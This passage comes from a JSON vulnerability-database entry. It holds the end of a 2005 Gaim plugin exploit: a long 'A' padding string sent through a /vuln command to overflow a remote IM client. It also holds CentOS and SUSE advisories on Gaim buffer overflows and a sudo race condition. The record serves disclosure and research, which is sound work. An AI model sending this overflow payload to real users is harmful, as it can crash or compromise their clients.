AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\";\r\n\r\ngboolean go(GaimConversation *conv, const gchar *cmd, gchar **args, gchar **error, void *data)\r\n{\r\n gaim_conv_im_send(GAIM_CONV_IM(conv), code);\r\n\r\n return GAIM_CMD_STATUS_OK;\r\n}\r\n\r\nstatic gboolean plugin_load(GaimPlugin *plugin)\r\n{\r\n cmd = gaim_cmd_register(\"vuln\", \"\", GAIM_CMD_P_DEFAULT, GAIM_CMD_FLAG_IM, NULL, (GaimCmdFunc)go, \"/vuln\", NULL);\r\n\r\n return TRUE;\r\n}\r\n\r\nstatic gboolean plugin_unload(GaimPlugin *plugin)\r\n{\r\n gaim_cmd_unregister (cmd);\r\n\r\n return TRUE;\r\n}\r\n\r\nstatic GaimPluginInfo info =\r\n{\r\n GAIM_PLUGIN_MAGIC,\r\n GAIM_MAJOR_VERSION,\r\n GAIM_MINOR_VERSION,\r\n GAIM_PLUGIN_STANDARD, /**< type */\r\n NULL, /**< ui_requirement */\r\n 0, /**< flags */\r\n NULL, /**< dependencies */\r\n GAIM_PRIORITY_DEFAULT, /**< priority */\r\n NULL, /**< id */\r\n N_(\"1.2.1 Email Overflow Demo\"), /**< name */\r\n VERSION, /**< version */\r\n /** summary */\r\n N_(\"\"),\r\n /** description */\r\n N_(\"\"),\r\n \"Ron <iago@valhallalegends.com>\", /**< author */\r\n \"\", /**< homepage */\r\n\r\n plugin_load, /**< load */\r\n plugin_unload, /**< unload */\r\n NULL, /**< destroy */\r\n\r\n NULL, /**< ui_info */\r\n NULL, /**< extra_info */\r\n NULL,\r\n NULL\r\n};\r\n\r\nstatic void init_plugin(GaimPlugin *plugin)\r\n{\r\n}\r\n\r\nGAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info)\n\n// milw0rm.com [2005-05-17]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/999/"}], "centos": [{"lastseen": "2018-01-24T23:00:39", "references": ["https://rhn.redhat.com/errata/rh21as-errata.html", "http://www.ict.swin.edu.au/staff/jnewbigin"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "2", "packageVersion": "0.59.9-4.el2", "packageFilename": "gaim-0.59.9-4.el2.i386.rpm", "packageName": "gaim", "arch": "i386", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2005:432-01\n\n\nThe Gaim application is a multi-protocol instant messaging client.\r\n\r\nA stack based buffer overflow bug was found in the way gaim processes a\r\nmessage containing a URL. A remote attacker could send a carefully crafted\r\nmessage resulting in the execution of arbitrary code on a victim's machine.\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\nassigned the name CAN-2005-1261 to this issue.\r\n\r\nA bug in the way Gaim processes SNAC packets was discovered. It is possible\r\nthat a remote attacker could send a specially crafted SNAC packet to a Gaim\r\nclient, causing the client to stop responding. The Common Vulnerabilities\r\nand Exposures project (cve.mitre.org) has assigned the name CAN-2005-0472\r\nto this issue.\r\n\r\nUsers of Gaim are advised to upgrade to this updated package which contains\r\ngaim version 0.59.9 with backported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/011657.html\n\n**Affected packages:**\ngaim\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 2, "reporter": "CentOS Project", "published": "2005-05-11T23:15:37", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "gaim security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0472", "CVE-2005-1261"], "modified": "2005-05-11T23:15:37", "href": "http://lists.centos.org/pipermail/centos-announce/2005-May/011657.html", "id": "CESA-2005:432-01", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:55:38", "references": [], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "1.6.7p5-118.2", "arch": "x86_64", "packageFilename": "sudo-1.6.7p5-118.2.x86_64.rpm", "packageName": "sudo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "1.6.8p7-3.2", "arch": "x86_64", "packageFilename": "sudo-1.6.8p7-3.2.x86_64.rpm", "packageName": "sudo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "1.6.7p5-117.4", "arch": "i586", "packageFilename": "sudo-1.6.7p5-117.4.i586.rpm", "packageName": "sudo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "1.6.8p7-3.2", "arch": "i586", "packageFilename": "sudo-1.6.8p7-3.2.i586.rpm", "packageName": "sudo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "1.6.7p5-120", "arch": "x86_64", "packageFilename": "sudo-1.6.7p5-120.x86_64.rpm", "packageName": "sudo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.2", "packageVersion": "1.6.6-192", "arch": "i586", "packageFilename": "sudo-1.6.6-192.i586.rpm", "packageName": "sudo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "1.6.7p5-118.2", "arch": "i586", "packageFilename": "sudo-1.6.7p5-118.2.i586.rpm", "packageName": "sudo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "1.6.7p5-120", "arch": "i586", "packageFilename": "sudo-1.6.7p5-120.i586.rpm", "packageName": "sudo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "1.6.7p5-117.4", "arch": "x86_64", "packageFilename": "sudo-1.6.7p5-117.4.x86_64.rpm", "packageName": "sudo", "operator": "lt"}], "description": "Sudo(8) allows the execution of commands as another user and gives the administrator more flexibility than su(1). A race condition in the pathname handling of sudo may allow a local user to execute arbitrary commands. To exploit this bug some conditions need to be fulfilled. The attacking user needs to be listed in the sudoers file, he is able to create symbolic links in the filesystem, and a ALL alias- command needs to follow the attackers entry.\n#### Solution\nIt is recommended to install the updated packages.", "edition": 1, "reporter": "Suse", "published": "2005-06-24T12:44:43", "title": "race condition, arbitrary code execution in sudo", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0208", "CVE-2005-1934", "CVE-2005-0473", "CVE-2005-0966", "CVE-2005-1409", "CVE-2005-0245", "CVE-2005-0246", "CVE-2005-1269", "CVE-2005-0244", "CVE-2005-0472", "CVE-2005-0965", "CVE-2005-0967", "CVE-2005-0227", "CVE-2005-1262", "CVE-2005-1686", "CVE-2005-1993", "CVE-2005-1410", "CVE-2005-0247"], "modified": "2005-06-24T12:44:43", "id": "SUSE-SA:2005:036", "href": "http://lists.opensuse.org/opensuse-security-announce/2005-06/msg00024.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
